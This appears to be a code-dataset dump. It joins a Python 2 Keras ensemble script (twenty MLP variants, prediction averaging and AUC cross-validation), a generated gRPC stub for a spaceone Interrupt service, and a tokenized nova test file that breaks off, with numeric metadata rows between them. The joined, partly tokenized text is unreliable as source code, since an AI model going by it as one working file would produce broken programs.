        model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.99, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV15: batch 128, 65 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V15 = {
    'batch_size':128,
    'nb_epoch':65,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV15(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 100-180-50-40 hidden units (he_normal init, PReLU +
        BatchNorm), SGD lr=0.01; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.2, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=100, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=100,output_dim=180, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.5))
        model.add(Dense(input_dim=180,output_dim=50, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.5))
        model.add(Dense(input_dim=50,output_dim=40, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=40,output_dim=2, init='he_normal', activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV16: batch 216, 89 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V16 = {
    'batch_size':216,
    'nb_epoch':89,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV16(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 140-250-90 hidden units (uniform init, LeakyReLU +
        BatchNorm; ModelV8 variant with a 0.6 second dropout), SGD lr=0.013;
        returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.2, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=140, init='uniform'))
        model.add(LeakyReLU(alpha=.00001))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=140,output_dim=250, init='uniform'))
        model.add(LeakyReLU(alpha=.00001))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=250,output_dim=90, init='uniform', activation='relu'))
        model.add(BatchNormalization())
        model.add(Dropout(0.4))
        model.add(Dense(input_dim=90,output_dim=2, init='uniform', activation='softmax'))
        #model.add(Activation('softmax'))
        sgd = SGD(lr=0.013, decay=1e-6, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
# Training options for ModelV17: batch 512, 90 epochs; inputs normalized and
# targets one-hot encoded.
PARAMS_V17 = {
    'batch_size':512,
    'nb_epoch':90,
    'verbose':1,
    'callbacks':[],
    'validation_split':0.,
    'validation_data':None,
    'shuffle':True,
    'show_accuracy':True,
    'class_weight':None,#{0:0.0396, 1:0.9604},
    'sample_weight':None,
    'normalize':True,
    'categorize_y':True
}
class ModelV17(BaseModel):
    def build_model(self):
        """Stage-1 MLP: 140-380-50-20 hidden units (he_normal init, PReLU +
        BatchNorm), SGD lr=0.01; returns a KerasClassifier."""
        model = Sequential()
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        model.add(Dense(input_dim=nn_input_dim_NN, output_dim=140, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=140,output_dim=380, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=380,output_dim=50, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.6))
        model.add(Dense(input_dim=50,output_dim=20, init='he_normal'))
        model.add(PReLU(init='zero'))
        model.add(BatchNormalization())
        model.add(Dropout(0.2))
        model.add(Dense(input_dim=20,output_dim=2, init='he_normal', activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',class_mode='binary')
        return KerasClassifier(nn=model,**self.params)
PARAMS_V18 = {
'batch_size':216,
'nb_epoch':80,
'verbose':1,
'callbacks':[],
'validation_split':0.,
'validation_data':None,
'shuffle':True,
'show_accuracy':True,
'class_weight':None,#{0:0.0396, 1:0.9604},
'sample_weight':None,
'normalize':True,
'categorize_y':True
}
class ModelV18(BaseModel):
    def build_model(self):
        """Build the V18 feed-forward net wrapped in a KerasClassifier.

        Input dropout, then four Dense/PReLU/BatchNorm/Dropout stacks
        (100 -> 360 -> 50 -> 20 units), finished by a 2-way softmax head.
        """
        model = Sequential()
        # Light dropout applied directly to the raw input features.
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        # (fan_in, fan_out, dropout_rate) for each hidden stack.
        hidden_stacks = [
            (nn_input_dim_NN, 100, 0.2),
            (100, 360, 0.6),
            (360, 50, 0.6),
            (50, 20, 0.1),
        ]
        for fan_in, fan_out, drop_rate in hidden_stacks:
            model.add(Dense(input_dim=fan_in, output_dim=fan_out,
                            init='he_normal'))
            model.add(PReLU(init='zero'))
            model.add(BatchNormalization())
            model.add(Dropout(drop_rate))
        # Two-unit softmax output for the binary target.
        model.add(Dense(input_dim=20, output_dim=2, init='he_normal',
                        activation='softmax'))
        sgd = SGD(lr=0.007, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',
                      class_mode='binary')
        return KerasClassifier(nn=model, **self.params)
# Fit/predict settings forwarded to KerasClassifier for ModelV19.
PARAMS_V19 = dict(
    batch_size=384,
    nb_epoch=80,
    verbose=1,
    callbacks=[],
    validation_split=0.,   # no internal hold-out; CV is handled externally
    validation_data=None,
    shuffle=True,
    show_accuracy=True,
    class_weight=None,     # alternative tried: {0: 0.0396, 1: 0.9604}
    sample_weight=None,
    normalize=True,
    categorize_y=True,     # presumably one-hot encodes y in the wrapper — confirm
)
class ModelV19(BaseModel):
    def build_model(self):
        """Build the V19 feed-forward net wrapped in a KerasClassifier.

        Input dropout, then four Dense/PReLU/BatchNorm/Dropout stacks
        (110 -> 350 -> 150 -> 20 units), finished by a 2-way softmax head.
        """
        model = Sequential()
        # Light dropout applied directly to the raw input features.
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        # (fan_in, fan_out, dropout_rate) for each hidden stack.
        hidden_stacks = [
            (nn_input_dim_NN, 110, 0.2),
            (110, 350, 0.6),
            (350, 150, 0.6),
            (150, 20, 0.2),
        ]
        for fan_in, fan_out, drop_rate in hidden_stacks:
            model.add(Dense(input_dim=fan_in, output_dim=fan_out,
                            init='he_normal'))
            model.add(PReLU(init='zero'))
            model.add(BatchNormalization())
            model.add(Dropout(drop_rate))
        # Two-unit softmax output for the binary target.
        model.add(Dense(input_dim=20, output_dim=2, init='he_normal',
                        activation='softmax'))
        sgd = SGD(lr=0.02, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',
                      class_mode='binary')
        return KerasClassifier(nn=model, **self.params)
# Fit/predict settings forwarded to KerasClassifier for ModelV20.
PARAMS_V20 = dict(
    batch_size=216,
    nb_epoch=82,
    verbose=1,
    callbacks=[],
    validation_split=0.,   # no internal hold-out; CV is handled externally
    validation_data=None,
    shuffle=True,
    show_accuracy=True,
    class_weight=None,     # alternative tried: {0: 0.0396, 1: 0.9604}
    sample_weight=None,
    normalize=True,
    categorize_y=True,     # presumably one-hot encodes y in the wrapper — confirm
)
class ModelV20(BaseModel):
    def build_model(self):
        """Build the V20 feed-forward net wrapped in a KerasClassifier.

        Input dropout, then four Dense/PReLU/BatchNorm/Dropout stacks
        (110 -> 200 -> 60 -> 80 units), finished by a 2-way softmax head.
        """
        model = Sequential()
        # Light dropout applied directly to the raw input features.
        model.add(Dropout(0.1, input_shape=(nn_input_dim_NN,)))
        # (fan_in, fan_out, dropout_rate) for each hidden stack.
        hidden_stacks = [
            (nn_input_dim_NN, 110, 0.3),
            (110, 200, 0.5),
            (200, 60, 0.6),
            (60, 80, 0.3),
        ]
        for fan_in, fan_out, drop_rate in hidden_stacks:
            model.add(Dense(input_dim=fan_in, output_dim=fan_out,
                            init='he_normal'))
            model.add(PReLU(init='zero'))
            model.add(BatchNormalization())
            model.add(Dropout(drop_rate))
        # Two-unit softmax output for the binary target.
        model.add(Dense(input_dim=80, output_dim=2, init='he_normal',
                        activation='softmax'))
        sgd = SGD(lr=0.01, decay=1e-10, momentum=0.9, nesterov=True)
        model.compile(optimizer=sgd, loss='binary_crossentropy',
                      class_mode='binary')
        return KerasClassifier(nn=model, **self.params)
if __name__ == "__main__":
m = ModelV1(name="v1_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V1,
kind = 's', fold_name='set1'
)
m.run()
m = ModelV2(name="v2_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V2,
kind = 's', fold_name='set2'
)
m.run()
m = ModelV3(name="v3_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V3,
kind = 's', fold_name='set3'
)
m.run()
m = ModelV4(name="v4_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V4,
kind = 's', fold_name='set4'
)
m.run()
m = ModelV5(name="v5_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V5,
kind = 's', fold_name='set5'
)
m.run()
m = ModelV6(name="v6_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V6,
kind = 's', fold_name='set6'
)
m.run()
m = ModelV7(name="v7_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V7,
kind = 's', fold_name='set7'
)
m.run()
m = ModelV8(name="v8_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V8,
kind = 's', fold_name='set8'
)
m.run()
m = ModelV9(name="v9_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V9,
kind = 's', fold_name='set9'
)
m.run()
m = ModelV10(name="v10_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V10,
kind = 's', fold_name='set10'
)
m.run()
m = ModelV11(name="v11_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V11,
kind = 's', fold_name='set11'
)
m.run()
m = ModelV12(name="v12_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V12,
kind = 's', fold_name='set12'
)
m.run()
m = ModelV13(name="v13_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V13,
kind = 's', fold_name='set13'
)
m.run()
m = ModelV14(name="v14_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V14,
kind = 's', fold_name='set14'
)
m.run()
m = ModelV15(name="v15_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V15,
kind = 's', fold_name='set15'
)
m.run()
m = ModelV16(name="v16_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V16,
kind = 's', fold_name='set16'
)
m.run()
m = ModelV17(name="v17_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V17,
kind = 's', fold_name='set17'
)
m.run()
m = ModelV18(name="v18_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V18,
kind = 's', fold_name='set18'
)
m.run()
m = ModelV19(name="v19_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V19,
kind = 's', fold_name='set19'
)
m.run()
m = ModelV20(name="v20_stage1_ver3",
flist=FEATURE_LIST_stage1,
params = PARAMS_V20,
kind = 's', fold_name='set20'
)
m.run()
print 'Done stage 1'
print 'Averaging'
# averaging
sample_sub = pd.read_csv('data/input/sample_submission.csv')
testID = sample_sub[['ID']]
a = pd.DataFrame()
for i in ['data/output/temp/v1_stage1_ver3_test.csv',
'data/output/temp/v2_stage1_ver3_test.csv',
'data/output/temp/v3_stage1_ver3_test.csv',
'data/output/temp/v4_stage1_ver3_test.csv',
'data/output/temp/v5_stage1_ver3_test.csv',
'data/output/temp/v6_stage1_ver3_test.csv',
'data/output/temp/v7_stage1_ver3_test.csv',
'data/output/temp/v8_stage1_ver3_test.csv',
'data/output/temp/v9_stage1_ver3_test.csv',
'data/output/temp/v10_stage1_ver3_test.csv',
'data/output/temp/v11_stage1_ver3_test.csv',
'data/output/temp/v12_stage1_ver3_test.csv',
'data/output/temp/v13_stage1_ver3_test.csv',
'data/output/temp/v14_stage1_ver3_test.csv',
'data/output/temp/v15_stage1_ver3_test.csv',
'data/output/temp/v16_stage1_ver3_test.csv',
'data/output/temp/v17_stage1_ver3_test.csv',
'data/output/temp/v18_stage1_ver3_test.csv',
'data/output/temp/v19_stage1_ver3_test.csv',
'data/output/temp/v20_stage1_ver3_test.csv',
]:
x = pd.read_csv(i)
a = pd.concat([a, x],axis=1)
#x['TARGET'] = (a.rank().mean(1))/a.shape[0]
# just averaging
x['TARGET'] = a.mean(1)
x = pd.concat([testID, x[['TARGET']]], axis=1)
x.to_csv('data/output/temp/test_NN_ikkiver3_variantA.csv', index=None)
#pubLB:
# averaging
a = pd.DataFrame()
train = pd.read_csv('data/input/train.csv')
targetID = train[['ID']]
for i in ['data/output/temp/v1_stage1_ver3_all_fold.csv',
'data/output/temp/v2_stage1_ver3_all_fold.csv',
'data/output/temp/v3_stage1_ver3_all_fold.csv',
'data/output/temp/v4_stage1_ver3_all_fold.csv',
'data/output/temp/v5_stage1_ver3_all_fold.csv',
'data/output/temp/v6_stage1_ver3_all_fold.csv',
'data/output/temp/v7_stage1_ver3_all_fold.csv',
'data/output/temp/v8_stage1_ver3_all_fold.csv',
'data/output/temp/v9_stage1_ver3_all_fold.csv',
'data/output/temp/v10_stage1_ver3_all_fold.csv',
'data/output/temp/v11_stage1_ver3_all_fold.csv',
'data/output/temp/v12_stage1_ver3_all_fold.csv',
'data/output/temp/v13_stage1_ver3_all_fold.csv',
'data/output/temp/v14_stage1_ver3_all_fold.csv',
'data/output/temp/v15_stage1_ver3_all_fold.csv',
'data/output/temp/v16_stage1_ver3_all_fold.csv',
'data/output/temp/v17_stage1_ver3_all_fold.csv',
'data/output/temp/v18_stage1_ver3_all_fold.csv',
'data/output/temp/v19_stage1_ver3_all_fold.csv',
'data/output/temp/v20_stage1_ver3_all_fold.csv',
]:
x = pd.read_csv(i)
a = pd.concat([a, x],axis=1)
#x['TARGET'] = (a.rank().mean(1))/a.shape[0]
# just averaging
x['TARGET'] = a.mean(1)
x = pd.concat([targetID, x[['TARGET']]], axis=1)
x.to_csv('data/output/temp/train_NN_ikkiver3_variantA.csv', index=None)
#pubLB:
print 'Done averaging'
print 'rank transformation with train and test'
#rank trafo with train and test
tr = pd.read_csv('data/output/temp/train_NN_ikkiver3_variantA.csv')
te = pd.read_csv('data/output/temp/test_NN_ikkiver3_variantA.csv')
tr_te = pd.concat([tr, te])
tr_te['TARGET'] = tr_te['TARGET'].rank()
# scale [0,1]
tr_te['TARGET'] = (tr_te['TARGET'] - tr_te['TARGET'].min()) / (tr_te['TARGET'].max() - tr_te['TARGET'].min())
tr = tr_te.iloc[:len(tr),:]
te = tr_te.iloc[len(tr):,:]
tr.to_csv('data/output/temp/train_NN_ikki_ver3.csv', index=False)
te.to_csv('data/output/temp/test_NN_ikki_ver3.csv', index=False)
print 'Done rank transformation'
print 'CV of each model per fold and averaging'
# CV of each model and averaging
from sklearn.metrics import roc_auc_score as AUC
a = pd.DataFrame()
set_idnex = 1
set_data = pd.read_csv('data/input/5fold_20times.csv')
y = train.TARGET
for i in ['data/output/temp/v1_stage1_ver3_all_fold.csv',
'data/output/temp/v2_stage1_ver3_all_fold.csv',
'data/output/temp/v3_stage1_ver3_all_fold.csv',
'data/output/temp/v4_stage1_ver3_all_fold.csv',
'data/output/temp/v5_stage1_ver3_all_fold.csv',
'data/output/temp/v6_stage1_ver3_all_fold.csv',
'data/output/temp/v7_stage1_ver3_all_fold.csv',
'data/output/temp/v8_stage1_ver3_all_fold.csv',
'data/output/temp/v9_stage1_ver3_all_fold.csv',
'data/output/temp/v10_stage1_ver3_all_fold.csv',
'data/output/temp/v11_stage1_ver3_all_fold.csv',
'data/output/temp/v12_stage1_ver3_all_fold.csv',
'data/output/temp/v13_stage1_ver3_all_fold.csv',
'data/output/temp/v14_stage1_ver3_all_fold.csv',
'data/output/temp/v15_stage1_ver3_all_fold.csv',
'data/output/temp/v16_stage1_ver3_all_fold.csv',
'data/output/temp/v17_stage1_ver3_all_fold.csv',
'data/output/temp/v18_stage1_ver3_all_fold.csv',
'data/output/temp/v19_stage1_ver3_all_fold.csv',
'data/output/temp/v20_stage1_ver3_all_fold.csv',
]:
x = pd.read_csv(i)
a = pd.concat([a, x],axis=1)
cv_index = {}
set_name = 'set{}'.format(set_idnex)
for i in xrange(5):
train_cv = set_data.loc[(set_data[set_name]!=i).values, set_name].index
test_cv = set_data.loc[(set_data[set_name]==i).values, set_name].index
cv_index[i] = {}
cv_index[i]['train'] = train_cv.values
cv_index[i]['test'] = test_cv.values
skf = pd.DataFrame(cv_index).stack().T
auc = []
for i in xrange(5):
#print AUC(y.ix[skf['test'][i]].values, x.ix[skf['test'][i]].values)
auc.append(AUC(y.ix[skf['test'][i]].values, x.ix[skf['test'][i]].values))
set_idnex += 1
print 'Per model, mean: {} std: {}'.format(np.mean(auc), np.std(auc))
print 'Averaging AUC:{}'.format(AUC(y.values,a.mean(1).values))
#AUC:
| 38.160714 | 113 | 0.565724 | 5,502 | 44,877 | 4.412577 | 0.06016 | 0.108081 | 0.058077 | 0.061949 | 0.885575 | 0.874495 | 0.869306 | 0.838372 | 0.799942 | 0.792858 | 0 | 0.053319 | 0.292043 | 44,877 | 1,175 | 114 | 38.193191 | 0.710837 | 0.024601 | 0 | 0.724417 | 0 | 0 | 0.186879 | 0.071621 | 0 | 0 | 0 | 0 | 0.001013 | 0 | null | null | 0 | 0.014184 | null | null | 0.008105 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
477b253dd16e8728cea153498c36566e44619888 | 6,429 | py | Python | venv/lib/python3.8/site-packages/spaceone/api/spot_automation/plugin/interrupt_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | venv/lib/python3.8/site-packages/spaceone/api/spot_automation/plugin/interrupt_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | venv/lib/python3.8/site-packages/spaceone/api/spot_automation/plugin/interrupt_pb2_grpc.py | choonho/plugin-prometheus-mon-webhook | afa7d65d12715fd0480fb4f92a9c62da2d6128e0 | [
"Apache-2.0"
] | null | null | null | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from spaceone.api.spot_automation.plugin import interrupt_pb2 as spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2
class InterruptStub(object):
"""Missing associated documentation comment in .proto file."""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.setup = channel.unary_unary(
'/spaceone.api.spot_automation.plugin.Interrupt/setup',
request_serializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.SetupRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.confirm = channel.unary_unary(
'/spaceone.api.spot_automation.plugin.Interrupt/confirm',
request_serializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.ConfirmInterruptRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.handle = channel.unary_unary(
'/spaceone.api.spot_automation.plugin.Interrupt/handle',
request_serializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleRequest.SerializeToString,
response_deserializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleInfo.FromString,
)
class InterruptServicer(object):
"""Missing associated documentation comment in .proto file."""
def setup(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def confirm(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def handle(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_InterruptServicer_to_server(servicer, server):
rpc_method_handlers = {
'setup': grpc.unary_unary_rpc_method_handler(
servicer.setup,
request_deserializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.SetupRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'confirm': grpc.unary_unary_rpc_method_handler(
servicer.confirm,
request_deserializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.ConfirmInterruptRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'handle': grpc.unary_unary_rpc_method_handler(
servicer.handle,
request_deserializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleRequest.FromString,
response_serializer=spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleInfo.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'spaceone.api.spot_automation.plugin.Interrupt', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Interrupt(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def setup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.spot_automation.plugin.Interrupt/setup',
spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.SetupRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def confirm(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.spot_automation.plugin.Interrupt/confirm',
spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.ConfirmInterruptRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def handle(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/spaceone.api.spot_automation.plugin.Interrupt/handle',
spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleRequest.SerializeToString,
spaceone_dot_api_dot_spot__automation_dot_plugin_dot_interrupt__pb2.HandleInfo.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 47.977612 | 145 | 0.704153 | 665 | 6,429 | 6.37594 | 0.15188 | 0.06934 | 0.042925 | 0.052123 | 0.850236 | 0.842925 | 0.826887 | 0.791509 | 0.778774 | 0.711557 | 0 | 0.004424 | 0.226474 | 6,429 | 133 | 146 | 48.338346 | 0.84818 | 0.088972 | 0 | 0.524272 | 1 | 0 | 0.089637 | 0.062694 | 0 | 0 | 0 | 0 | 0 | 1 | 0.07767 | false | 0 | 0.029126 | 0.029126 | 0.165049 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4787b37899749d3edce8026358ec264b130f162a | 102,091 | py | Python | nova/tests/unit/api/openstack/compute/test_server_actions.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/api/openstack/compute/test_server_actions.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/api/openstack/compute/test_server_actions.py | bopopescu/nova-token | ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2 | [
"Apache-2.0"
] | 2 | 2017-07-20T17:31:34.000Z | 2020-07-24T02:42:19.000Z | begin_unit
comment|'# Copyright 2011 OpenStack Foundation'
nl|'\n'
comment|'# All Rights Reserved.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'uuid'
newline|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
name|'from'
name|'mox3'
name|'import'
name|'mox'
newline|'\n'
name|'from'
name|'oslo_utils'
name|'import'
name|'uuidutils'
newline|'\n'
name|'import'
name|'webob'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
op|'.'
name|'api'
op|'.'
name|'openstack'
op|'.'
name|'compute'
name|'import'
name|'extension_info'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'api'
op|'.'
name|'openstack'
op|'.'
name|'compute'
name|'import'
name|'servers'
name|'as'
name|'servers_v21'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'compute'
name|'import'
name|'api'
name|'as'
name|'compute_api'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'compute'
name|'import'
name|'task_states'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'compute'
name|'import'
name|'vm_states'
newline|'\n'
name|'import'
name|'nova'
op|'.'
name|'conf'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'exception'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'image'
name|'import'
name|'glance'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'objects'
newline|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'api'
op|'.'
name|'openstack'
name|'import'
name|'fakes'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'fake_block_device'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
name|'import'
name|'fake_instance'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'tests'
op|'.'
name|'unit'
op|'.'
name|'image'
name|'import'
name|'fake'
newline|'\n'
nl|'\n'
DECL|variable|CONF
name|'CONF'
op|'='
name|'nova'
op|'.'
name|'conf'
op|'.'
name|'CONF'
newline|'\n'
DECL|variable|FAKE_UUID
name|'FAKE_UUID'
op|'='
name|'fakes'
op|'.'
name|'FAKE_UUID'
newline|'\n'
DECL|variable|INSTANCE_IDS
name|'INSTANCE_IDS'
op|'='
op|'{'
name|'FAKE_UUID'
op|':'
number|'1'
op|'}'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|return_server_not_found
name|'def'
name|'return_server_not_found'
op|'('
op|'*'
name|'arg'
op|','
op|'**'
name|'kwarg'
op|')'
op|':'
newline|'\n'
indent|' '
name|'raise'
name|'exception'
op|'.'
name|'InstanceNotFound'
op|'('
name|'instance_id'
op|'='
name|'FAKE_UUID'
op|')'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|function|instance_update_and_get_original
dedent|''
name|'def'
name|'instance_update_and_get_original'
op|'('
name|'context'
op|','
name|'instance_uuid'
op|','
name|'values'
op|','
nl|'\n'
